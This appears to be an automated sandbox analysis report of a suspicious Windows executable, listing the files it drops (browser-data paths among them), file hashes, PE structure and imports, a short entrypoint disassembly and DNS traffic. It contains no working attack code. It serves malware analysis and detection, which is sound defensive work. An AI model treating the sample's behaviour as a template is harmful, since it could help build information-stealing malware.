                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Web Data1607186582842
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\crx.json
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Localwebdata1607186582842
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Roaming\1607186572092.exe
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Roaming\1607186572092.txt
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\1607186572092.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Roaming\1607186588295.exe
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Roaming\1607186588295.txt
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\1607186588295.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.978069787985718
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: h1GodtbhC8.exe
File size: 4671378
MD5: 3ca6df4914385efd4ba9cd239b5ed254
SHA1: b66535ff43334177a5a167b9f2b07ade75484eec
SHA256: 0acebaf80946be0cb3099233e8807aa775c8304fc3dee48d42241ff68b7ab318
SHA512: 7951ab74ecd2ea26ed7bbcbc8bf34a770854a8fb009f256f93d72c705871b5a31c24153cc77581eec6544085cdbb51a170b2b7ef9f3f9139572b818d75424ca6
SSDEEP: 98304:ijIHEaC7gS8j+u8ME/F59JdQVDQYxb6FqrnGGs3ycc6dNIdvlDPAQ1q14gaT:ijeEaC7gS6wMEdv4BQYhGPNPgdvlDHoG
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8.....

File Icon

Icon Hash: 5c5cd81ce4e4e0e2

Static PE Info

General

Entrypoint: 0x4038af
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: be41bf7b8cc010b614bd36bbca606973

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007F158C36174Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007F158C36142Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007F158C36141Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007F158C35ED1Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007F158C3610F1h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F158C35EDA3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F158C35ED1Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [LNK] VS2010 SP1 build 40219

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x134000 | 0xc308 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | False | 0.656654094828 | data | 6.49970859063 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | False | 0.367897727273 | data | 4.49793253515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | False | 0.279296875 | data | 1.80494062846 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x7f000 | 0xb5000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x134000 | 0xc308 | 0xc400 | False | 0.0863560267857 | data | 2.71075910677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x141000 | 0xfd6 | 0x1000 | False | 0.062744140625 | PGP\011Secret Sub-key - | 2.12802410158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x134358 | 0x4228 | data | English | United States
RT_ICON | 0x138580 | 0x25a8 | dBase III DBT, version number 0, next free block index 40, 1st item "I\310\354\377\221\347\377\377s\337\375\377\265\357\377\377\227\350\377\377\214\346\377\377\213\346\377\377\212\345\377\377\211\345\377\377\210\345\377\377\207\345\377\377\206\344\377\377\205\344\377\377\204\344\377\377U\312\355\377u\333\371\377\203\344\377\377F\301\347\377" | English | United States
RT_ICON | 0x13ab28 | 0x1a68 | dBase III DBT, version number 0, next free block index 40 | English | United States
RT_ICON | 0x13c590 | 0x10a8 | data | English | United States
RT_ICON | 0x13d638 | 0xfe9 | data | English | United States
RT_ICON | 0x13e628 | 0x988 | data | English | United States
RT_ICON | 0x13efb0 | 0x6b8 | data | English | United States
RT_ICON | 0x13f668 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x13fad0 | 0x100 | data | English | United States
RT_DIALOG | 0x13fbd0 | 0x11c | data | English | United States
RT_DIALOG | 0x13fcf0 | 0xc4 | data | English | United States
RT_DIALOG | 0x13fdb8 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x13fe18 | 0x76 | data | English | United States
RT_VERSION | 0x13fe90 | 0x18c | PGP symmetric key encrypted data - Plaintext or unencrypted data | |
RT_MANIFEST | 0x140020 | 0x2e1 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Version Infos

Description | Data
LegalCopyright |
ProductVersion | 0.0.0
FileVersion | 0.0.0
FileDescription |
Translation | 0x0000 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets


UDP Packets

                                                                                                                                                  Dec 5, 2020 08:43:44.932121038 CET6397853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:44.967658043 CET53639788.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:45.510519981 CET6293853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:45.545907974 CET53629388.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.052850008 CET5570853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.052906036 CET5680353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET53568038.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.448940039 CET5714553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET53557088.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.488394976 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.492825985 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.497859001 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.503201962 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.507247925 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET53571458.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.886359930 CET5535953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.894771099 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.920553923 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.921921015 CET53553598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.924384117 CET5830653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.959666014 CET53583068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:47.464710951 CET6412453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:47.500004053 CET53641248.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.010875940 CET4936153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.046248913 CET53493618.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.114943027 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.118016005 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.121144056 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.124800920 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.467833042 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.469470978 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.470809937 CET6315053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.504851103 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.506387949 CET53631508.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.506843090 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.508157969 CET5327953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.541173935 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.541522980 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.542056084 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.542855978 CET5688153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.557689905 CET5364253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.576889992 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.578296900 CET53568818.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.578788042 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.580691099 CET5566753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.593235016 CET53536428.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.614557981 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.616168976 CET53556678.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.616544008 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.617836952 CET5483353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.654295921 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.654336929 CET53548338.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.654639006 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.656128883 CET6247653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.681833982 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.691803932 CET53624768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.692184925 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.693607092 CET4970553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.727684975 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.729172945 CET53497058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.105391026 CET6147753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.141067982 CET53614778.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.510230064 CET5327953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.545767069 CET53532798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.546184063 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.547491074 CET6163353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.582858086 CET53616338.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.651437044 CET5594953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.678586006 CET53559498.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.899038076 CET53532798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.931978941 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.932180882 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.933799028 CET5760153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.967845917 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.969422102 CET53576018.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.971388102 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.973582029 CET4934253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.998538971 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:50.009165049 CET53493428.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:50.183084011 CET5625353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:50.218580008 CET53562538.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:50.730550051 CET4966753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:50.766110897 CET53496678.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:51.276849031 CET5543953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:51.312589884 CET53554398.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:51.823340893 CET5706953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:51.858886957 CET53570698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:52.408591986 CET5765953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:52.444046021 CET53576598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:52.955682993 CET5471753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:52.993534088 CET53547178.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:56.624989986 CET6397553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:56.625580072 CET5663953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:56.660892010 CET53566398.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:56.661736012 CET53639758.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:57.236421108 CET5185653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:57.274240017 CET53518568.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.803669930 CET5654653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.804709911 CET6215253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET53565468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET53621528.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.846127987 CET5347053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.857948065 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.864092112 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.870414019 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.875919104 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET53534708.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.884202003 CET5644653192.168.2.38.8.8.8
